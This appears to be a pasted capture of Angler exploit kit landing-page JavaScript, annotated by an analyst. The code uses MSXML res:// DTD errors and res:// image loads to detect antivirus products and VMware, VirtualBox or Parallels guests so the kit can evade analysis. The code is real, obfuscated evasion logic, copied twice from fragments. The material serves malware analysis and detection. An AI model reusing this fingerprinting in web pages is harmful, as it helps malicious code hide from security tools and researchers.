Kafeine

AnglerEK_CVE-2013-7331_2014-10-11

Oct 11th, 2014
// Anti-analysis probe from this Angler EK landing page (the paste title attributes
// it to CVE-2013-7331). It hands MSXML a DOCTYPE whose external DTD is a res://
// URI pointing at a local driver file, then reads parseError.errorCode. The error
// code presumably differs depending on whether
// c:\Windows\System32\drivers\<txt>.sys exists, so the page can fingerprint
// installed AV / VM-guest drivers without triggering a script error.
// Returns 1 when the error text contains "-2147023083", 0 otherwise.
// Analyst note: -2147023083 is HRESULT 0x80070715 = Win32 error 1813
// (ERROR_RESOURCE_TYPE_NOT_FOUND), i.e. the file was opened but held no matching
// resource — which only happens when the file is present (verify against MSXML).
// Detection: property names are assembled from string fragments so a literal
// match on "XMLDOM" / "loadXML" / "parseError" fails; look instead for
// Microsoft.XMLDOM instantiation paired with a res:// DOCTYPE in page script.
// Only effective in IE with ActiveX enabled and the disclosure bug unpatched.
function gs7sfd(txt) {
    // Fragments resolve to: 'XMLDOM', 'parseError', 'loadXML',
    // 'DTD XHTML 1.0 Transitional', 'errorCode'.
    var v1 = 'XM' + 'LD' + 'OM',
        v2 = 'pa' + 'rseE' + 'rr' + 'or',
        v3 = 'loa' + 'dX' + 'ML',
        v4 = 'DT' + 'D X' + 'HTML 1.0 Transitional',
        v5 = 'err' + 'orC' + 'ode';
    // Probe target: a kernel driver file chosen by the caller (AV / hypervisor).
    var resInf = new ActiveXObject("Microsoft." + v1),
        subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
    resInf.async = true;
    // loadXML with the res:// DTD reference; the parser's attempt to fetch it is
    // what leaks the file's existence via the resulting error code.
    resInf[v3]('<!DOCTYPE html PUBLIC "-//W3C//' + v4 + '//EN" "res://' + subpath + '">');
    if (resInf[v2][v5] != 0) {
        // Error text is built only so indexOf can test for the marker code.
        var pe = resInf[v2],
            err = "Error Code: " + pe[v5] + "\n";
        err += "Error Reason: " + pe.reason;
        err += "Error Line: " + pe.line;
        // > 0 is safe here: the code can never sit at index 0 after "Error Code: ".
        if (err.indexOf("-2147023083") > 0) {
            return 1;
        } else {
            return 0;
        }
    }
    return 0;
}
// First presence check: instantiating Kaspersky's virtual-keyboard browser plugin
// succeeds only when that product is installed; the catch leaves tmp false.
// Any truthy tmp (the ActiveX object itself) is later treated as "AV present".
var tmp;
try {
    tmp = new ActiveXObject('Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.1');
} catch (e) {
    tmp = false;
}
  30.   if (tmp || gs7sfd("kl1") || gs7sfd("tmactmon") || gs7sfd("tmcomm") || gs7sfd("tmevtmgr") || gs7sfd("TMEBC32") || gs7sfd("tmeext") || gs7sfd("tmnciesc") || gs7sfd("tmtdi") || gs7sfd("vm3dmp") || gs7sfd("vmusbmouse") || gs7sfd("vmmouse") || gs7sfd("vmhgfs") || gs7sfd("VBoxGuest") || gs7sfd("VBoxMouse") || gs7sfd("VBoxSF") || gs7sfd("VBoxVideo") || gs7sfd("prl_boot") || gs7sfd("prl_fs") || gs7sfd("prl_kmdd") || gs7sfd("prl_memdev") || gs7sfd("prl_mouf") || gs7sfd("prl_pv32") || gs7sfd("prl_sound") || gs7sfd("prl_strg") || gs7sfd("prl_tg") || gs7sfd("prl_time")) {
  31.       Target();
  32.   } else {
    // Second probing technique: load a res:// URI as an image. onload fires only
    // when the referenced resource (an icon/bitmap inside a product DLL/EXE)
    // exists, so a successful load means the product is installed; Target is
    // then invoked (defined outside this excerpt — see the SYMEVENT variant below
    // for what it does there).
    // Note: x is assigned without var, so it becomes an implicit global.
    function Check(s) {
        x = new Image();
        x.onload = Target;
        x.src = s;
        return 0;
    }
    // Table of res:// resource URIs (DLL/EXE path + resource type + resource id)
    // for a range of Kaspersky Anti-Virus / Internet Security / PURE releases,
    // plus VMware Tools, VirtualBox Guest Additions and Parallels Tools binaries.
    // Each entry is fed to Check(); a load success marks that product or
    // hypervisor guest as present. Fragments kv1..kv6 are concatenated so the
    // full vendor path strings never appear literally in the script.
    var kv1 = "res://C:\\Program Files",
        kv2 = "\\Kaspersky Lab\\Kaspersky ",
        kv3 = "Anti-Virus ",
        kv4 = "Internet Security ",
        kv5 = "\\shellex.dll/#2/#102",
        kv6 = "\\mfc42.dll/#2/#26567",
        pathdata = [kv1 + kv2 + kv3 + '5.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0' + kv5, kv1 + kv2 + kv3 + '7.0' + kv5, kv1 + kv2 + kv3 + '2009' + kv6, kv1 + kv2 + kv3 + '2010' + kv6, kv1 + kv2 + kv3 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv3 + '2012\\x86' + kv6, kv1 + kv2 + kv3 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '6.0' + kv5, kv1 + kv2 + kv4 + '7.0' + kv5, kv1 + kv2 + kv4 + '2009' + kv6, kv1 + kv2 + kv4 + '2010' + kv6, kv1 + kv2 + kv4 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv4 + '2012\\x86' + kv6, kv1 + kv2 + kv4 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '14.0.0\\x86' + kv6, kv1 + kv2 + kv4 + '15.0.0\\x86' + kv6, kv1 + kv2 + 'PURE' + kv6, kv1 + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + kv2 + 'PURE 3.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv3 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv4 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 3.0\\x86' + kv6, 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567', 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996', 'res://C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110', 'res://C:\\Program Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204'];
  46.  
  47. [-----]
  48.  
  49.  
// Second copy of the driver-existence probe (identical to the one above; the
// paste shows two separately captured fragments of the same landing page).
// Uses MSXML's parseError after loading a DOCTYPE whose DTD is a res:// URI to a
// local .sys file — the information-disclosure behaviour the title ties to
// CVE-2013-7331. Returns 1 when the error text contains "-2147023083"
// (HRESULT 0x80070715 / Win32 1813 ERROR_RESOURCE_TYPE_NOT_FOUND, which is
// consistent with "file present, no such resource" — verify), else 0.
// Detection: Microsoft.XMLDOM created via a concatenated ProgID plus a res://
// DOCTYPE; the fragmented strings defeat naive literal signatures.
function gs7sfd(txt) {
    // 'XMLDOM', 'parseError', 'loadXML', 'DTD XHTML 1.0 Transitional', 'errorCode'
    var v1 = 'XM' + 'LD' + 'OM',
        v2 = 'pa' + 'rseE' + 'rr' + 'or',
        v3 = 'loa' + 'dX' + 'ML',
        v4 = 'DT' + 'D X' + 'HTML 1.0 Transitional',
        v5 = 'err' + 'orC' + 'ode';
    var resInf = new ActiveXObject("Microsoft." + v1),
        subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
    resInf.async = true;
    // The parser's fetch of the res:// DTD is what surfaces the file's existence.
    resInf[v3]('<!DOCTYPE html PUBLIC "-//W3C//' + v4 + '//EN" "res://' + subpath + '">');
    if (resInf[v2][v5] != 0) {
        var pe = resInf[v2],
            err = "Error Code: " + pe[v5] + "\n";
        err += "Error Reason: " + pe.reason;
        err += "Error Line: " + pe.line;
        if (err.indexOf("-2147023083") > 0) {
            return 1;
        } else {
            return 0;
        }
    }
    return 0;
}
// Symantec / Norton presence gate. stopFlag ends up truthy when any of three
// checks hits: the SYMEVENT driver file (via gs7sfd), the Symantec IPS
// WebProtection ActiveX control, or a successful res:// image load of a Norton
// engine DLL resource. The rest of the landing page (not in this excerpt)
// presumably consults stopFlag before continuing.
var stopFlag;
if (gs7sfd("SYMEVENT")) {
    stopFlag = true;
} else {
    try {
        // Redeclared with var inside the try; hoisting makes it the same binding.
        var stopFlag = new ActiveXObject("Symantec.IPS.WebProtection.1");
    } catch (e) {
        stopFlag = false;
    }
    if (!stopFlag) {
        // Image onload callback: a loaded res:// resource means the DLL exists.
        function Target() {
            stopFlag = true;
        }

        // Same res:// image-probe pattern as above; x is an implicit global.
        function Check(s) {
            x = new Image();
            x.onload = Target;
            x.src = s;
            return 0;
        }
        // Resource ids inside two specific Norton Internet Security engine builds;
        // only those exact versions are detected by this table.
        pathdata = ["res://C:\\Program Files\\Norton Internet Security\\Engine\\21.1.0.18\\asOEHook.dll/#2/#102", "res://C:\\Program Files\\Norton Internet Security\\Engine\\21.6.0.32\\asOEHook.dll/#2/#102"];
        for (var i = 0; i < pathdata.length; ++i) Check(pathdata[i]);

        // Busy-wait spin on Date() for `millis` ms. Presumably gives the
        // asynchronous image loads time to fire onload before stopFlag is read;
        // blocks the UI thread for the whole interval.
        function pauseIt(millis) {
            var date = new Date();
            var curDate = null;
            do {
                curDate = new Date();
            } while (curDate - date < millis);
        }
        pauseIt(1000);
    }
}